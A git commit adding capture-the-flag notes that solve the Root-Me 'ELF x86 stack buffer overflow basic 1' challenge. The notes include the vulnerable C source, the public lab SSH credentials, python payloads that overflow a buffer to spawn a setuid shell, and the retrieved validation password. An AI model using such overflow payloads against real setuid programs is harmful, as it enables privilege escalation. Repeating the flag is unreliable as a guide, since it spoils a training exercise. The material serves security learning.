feat: app system challenges

Signed-off-by: Tuan-Dat Tran <tuan-dat.tran@dextradata.com>
2026-03-23 09:19:03 +01:00
parent de45645553
commit 5cd3b5a531
14 changed files with 715 additions and 0 deletions
--- a/app-system/elf-x86-stack-buffer-overflow-basic-1/notes.org
+++ b/app-system/elf-x86-stack-buffer-overflow-basic-1/notes.org
@@ -0,0 +1,97 @@
+* ELF x86 - Stack buffer overflow basic 1
+Aufgabe
+Einstellungen der Umgebung
+PIE 	Position Independent Executable 	 pas_valide.svg?1566650180
+RelRO 	Read Only relocations 	 pas_valide.svg?1566650180
+NX 	Non-Executable Stack 	 pas_valide.svg?1566650180
+Heap exec 	Non-Executable Heap 	 pas_valide.svg?1566650180
+ASLR 	Address Space Layout Randomization 	 pas_valide.svg?1566650180
+SF 	Source Fortification 	 pas_valide.svg?1566650180
+SRC 	Zugriff auf den Source code 	 valide.svg?1566650190
+Quellcode
+#+begin_src C
+    #include <unistd.h>
+    #include <sys/types.h>
+    #include <stdlib.h>
+    #include <stdio.h>
+
+    int main()
+    {
+
+      int var;
+      int check = 0x04030201;
+      char buf[40];
+
+      fgets(buf,45,stdin);
+
+      printf("\n[buf]: %s\n", buf);
+      printf("[check] %p\n", check);
+
+      if ((check != 0x04030201) && (check != 0xdeadbeef))
+        printf ("\nYou are on the right way!\n");
+
+      if (check == 0xdeadbeef)
+       {
+         printf("Hell yeah! You win!\nOpening your shell...\n");
+         setreuid(geteuid(), geteuid());
+         system("/bin/bash");
+         printf("Shell closed! Bye.\n");
+       }
+       return 0;
+    }
+#+end_src
+
+#+begin_quote
+Zugangsdaten für die Übung
+Host	challenge02.root-me.org
+Protokoll	SSH
+Port	2222
+Zugang per SSH 	ssh -p 2222 app-systeme-ch13@challenge02.root-me.org
+Benutzername	app-systeme-ch13
+Passwort	app-systeme-ch13
+#+end_quote
+
+#+begin_src sh
+python3 -c "import sys; sys.stdout.buffer.write(b'A'*(40) + b'\xef\xbe\xad\xde')" | ./ch13
+#+end_src
+
+** Findings (live target)
+
+- Remote path: =/challenge/app-systeme/ch13=
+- Binary: =ch13: setuid ELF 32-bit, dynamically linked, not stripped=
+- Effective mitigations from runtime check:
+  - Partial RELRO
+  - No stack canary
+  - NX enabled
+  - No PIE
+  - ASLR OFF (on target host)
+- Vulnerability: =fgets(buf,45,stdin)= writes up to 44 bytes into =char buf[40]=, overflowing 4 bytes into adjacent =check=.
+- Target value: overwrite =check= from =0x04030201= to =0xdeadbeef= (little-endian bytes =\xef\xbe\xad\xde=).
+
+** Working exploitation flow
+
+- Basic trigger (proves control of =check=):
+
+#+begin_src sh
+python3 -c "import sys; sys.stdout.buffer.write(b'A'*40 + b'\xef\xbe\xad\xde')" | ./ch13
+#+end_src
+
+- To keep stdin open for the spawned SUID shell, use a pipeline with =cat=:
+
+#+begin_src sh
+(python3 -c "import sys; sys.stdout.buffer.write(b'A'*40+b'\xef\xbe\xad\xde')"; cat) | ./ch13
+id
+cat .passwd
+exit
+#+end_src
+
+- Observed privilege in spawned shell:
+  - =uid=1213(app-systeme-ch13-cracked)=
+  - =gid=1113(app-systeme-ch13)=
+- Retrieved validation password:
+  - =1w4ntm0r3pr0np1s=
+
+** Helper scripts
+
+- =helper_recon.py=: SSH recon script (pwd, ls, file, checksec, smoke run).
+- =helper_exploit_password.py=: SSH interactive exploit script that keeps stdin open and reads =.passwd=.